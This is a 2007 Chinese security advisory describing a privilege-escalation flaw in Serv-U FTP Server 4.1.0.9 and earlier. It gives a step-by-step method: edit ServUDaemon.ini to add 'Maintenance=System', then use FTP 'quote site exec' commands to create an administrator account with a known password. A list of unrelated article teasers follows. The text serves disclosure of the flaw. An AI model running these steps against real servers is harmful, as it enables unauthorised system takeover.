Serv-U FTP Server远程/本地提升权限缺陷
来源:天新网 发布时间:2007-08-13 14:08:00
本地提升权限:是
远程提升权限:是
使用前提条件:对Serv-U配置文件有修改权限
声明:这只是一个提升权限的思路和方法。
一、受影响的软件
Serv-U FTP Server 4.1.0.9 (以及以前所有版本)
二、受影响系统
Microsoft Windows Server 2003 所有版本
Microsoft Windows XP 所有版本
Microsoft Windows 2000 所有版本
Microsoft Windows NT 所有版本
三、综述
Serv-U FTP Server为RhinoSoft出品的一款Ftp Sserver软件,目前在全世界广为使用。经我研究发现,Serv-U FTP Server的配置文件存贮于Serv-U FTP Server文件目录下的ServUDaemon.ini文件中。如果本地受限用户或者远程拥有普通权限的攻击者能接触到该文件并精心构造ServUDaemon.ini文件中的内容就能利用Ftp进程在系统上以SYSTEM权限执行任意命令。
四、缺陷分析:
Serv-U FTP Serve在设置用户以后会把配置信息存储与ServUDaemon.ini文件中。包括用户的权限信息和可访问目录信息。本地受限用户或者是远程攻击者只要能够读写Serv-U FTP Serve的文件目录,就可以通过修改目录中的ServUDaemon.ini文件实现以Ftp进程在远程、本地系统上以FTP系统管理员权限来执行任意命令。并且不受系统版本的影响。(用户信息选择“存储与系统注册表中”不受此缺陷影响)
五、测试方法:
1、本地测试
假设本地受限用户可以浏览Serv-U FTP Serve的文件目录。找到ServUDaemon.ini文件。用记事本打开原文件大致内容为:
[GLOBAL]
Version=4.1.0.0 // Serv-U Ftp Server 版本号
ProcessID=584
RegistrationKey=UEyz459waBR4lVRkIkh4dYw9f8v4J/AHLvpOK8tqOkyz4D3wbymil1VkKjgdAelPDKSWM5doXJsgW64YIyPdo+wAGnUBuycB
[DOMAINS]
Domain1=127.0.0.1||21|127.0.0.1|1|0 //主机IP以及域名,端口情况
[Domain1]
User1=zihuan|1|0
[USER=zihuan|1]
Password=rfE8DFBE3F7EC27FB043D4305A04E6D2C6
HomeDir=c:\ // 可以浏览的目录
TimeOut=600
Access1=C:\|RWAMLCDP
如果把ServUDaemon.in文件修改为:
[GLOBAL]
Version=4.1.0.0
ProcessID=584
RegistrationKey=UEyz459waBR4lVRkIkh4dYw9f8v4J/AHLvpOK8tqOkyz4D3wbymil1VkKjgdAelPDKSWM5doXJsgW64YIyPdo+wAGnUBuycB
[DOMAINS]
Domain1=127.0.0.1||21|127.0.0.1|1|0
[Domain1]
User1=zihuan|1|0
[USER=zihuan|1]
Password=rfE8DFBE3F7EC27FB043D4305A04E6D2C6
HomeDir=c:\
TimeOut=600
Maintenance=System //权限类型
Access1=C:\|RWAMELCDP
以上内容比原内容多了一句“Maintenance=System”修改完成后保存。然后在用Ftp登陆到Serv-U FTP Server以后执行如下命令:
ftp>open ip
Connected to ip.
220 Serv-U FTP Server v4.1.0.0 for WinSock ready...
User (ip:(none)): id //输入构造的用户
331 User name okay, please send complete E-mail address as password.
Password:password //密码
230 User logged in, proceed.
ftp> cd winnt //进入win2k的winnt目录,如果是winxp或者是windows server 2003就应该为windows目录。
250 Directory changed to /WINNT
ftp>cd system32 //进入system32目录
250 Directory changed to /WINNT/system32
ftp>quote site exec net.exe user zihuan ziHUAN /add //利用系统的net.exe文件加用户。
200 EXEC command successful (TID=33).
ftp>quote site exec net.exe localhost administrators zihuan /add //提升为超级用户
这样就在本地系统上加了一个为zihuan密码为:ziHUAN的超级用户。也可以直接用quote site exec net.exe localhost administrators user /add命令把当前用户提升到超级用户组中去。当然也可以在系统上执行任何命令。
声明:
本本仅用来描述可能存在的安全问题,作者本人和黑客X档案杂志社不为此安全公告提供任何保证或承诺。由于传播、利用此文章提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本文作者不为此承担任何责任。作者拥有对此安全公告的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者本人允许,不得任意修改或者增减此文章公告内容。
猜你喜欢
- 当大多数同龄人还在靠周末辛苦打工赚一点零用钱时,16岁的英国小企业家乔纳森·格鲁宾已通过他所建立的3家网站掘出第一桶金,仅去年就赚了7.5万
- RedHat Linux 为增加系统安全性提供了防火墙保护。防火墙存在于你的计算机和网络之间,用来判定网络中的远程用户有权访问你的计算机上的
- 如果你的VPS上有个文件要传到另一个VPS上,最最简单的方法有两种。一个是先下载到本地,然后上传到另一个VPS,这个方法的缺点是速度慢。另一
- 对于大多数SEO(搜索引擎优化)学习者来说,网站的框架结构是SEO优化一大弊。其实不然,我们可以采取一些SEO技术手段,使得框架优化存在,保
- 所谓入门级网站,就是访问量在500到5000之间的网站,一般来说,进入这个级数的网站需要了解alexa的排名原理,具体的情况请www.ale
- 前几天接到一个装潢公司的网络推广客户,所以就去百度搜索“装潢公司”、“合肥装潢公
- 职业的炒信用公司见过很多,我还真是第一次听说“中差评删除公司”。这两天有机会与一位自称是&l
- 23日从工业和信息化部了解到,截至2月份,我国网民数达2.21亿人,超过美国居全球首位。在2007年底,这一数字为2.1亿人。据了解,今年在
- 作为Internet上的FTP服务器,系统的安全性是非常重要的,这是建立FTP服务器者所考虑的第一个问题。其安全性主要包括以下几个方面:一、
- 1.前言:木马的危害,在于它能够远程控制你的电脑。当你成为“肉鸡”的时候,别人(控制端)就可以进入你的电脑,偷看你的文件、盗窃密码、甚至用你
- 在过去一年多的优化中,我们遇到过不少这样的案例,发布商的广告网页展示次数、广告配置、网站运营都没有太大的变化,但点击率却一直在下降。在我们的
- 今天要介绍的是Godaddy的域名管理教程,详细步骤如下:1.登陆帐户2.点hosting,如图所示。点manageaccount3.在Se
- 北京时间10月24日,据国外媒体报道,专门研究微软公司的独立研究机构Directions on Microsoft分析师罗布·赫尔姆(Rob
- 本期教程笔者为大家讲解在Discuz! 7.1下如何给通过WAP发布的帖子加标记。如果回复或者主题是通过wap发布的,则在帖子信息中显示出来
- 10月23日消息,国内领先的社交网站51.com宣布,截止2009年10月中旬,该网站用户上传的图片数量已经超过110亿张,相比去年10月份
- 今天一个跳街舞的朋友找我,19岁的小mm,她上网的习惯应该是比较普遍的网民的上网习惯。吃饭之余我也问了一些关于她上网的习惯,很有启发,虽然很
- 在Discuz!7.0中,有些站长在设置用户组时,可能不小心误删了其他用户组,这样会导致原本属于该用户组的用户无法正常访问论坛。下面笔者详细
- 常用组件主要包括Aspjpeg、Jmail、LyfUpload、动易、ISAPI_ReWrite等,本文就仅说这5种,其他类型组件可以根据需
- Ad Manager是Google推出的网络广告管理平台。按照官方的介绍,它是一个托管式的广告管理解决方案,可以帮助用户对自己的广告资源进行
- 图为山寨央视网站首页。(记者 齐广君 摄)山寨网站冒充央视骗钱财 民警提醒市民要警惕“非常6+1”是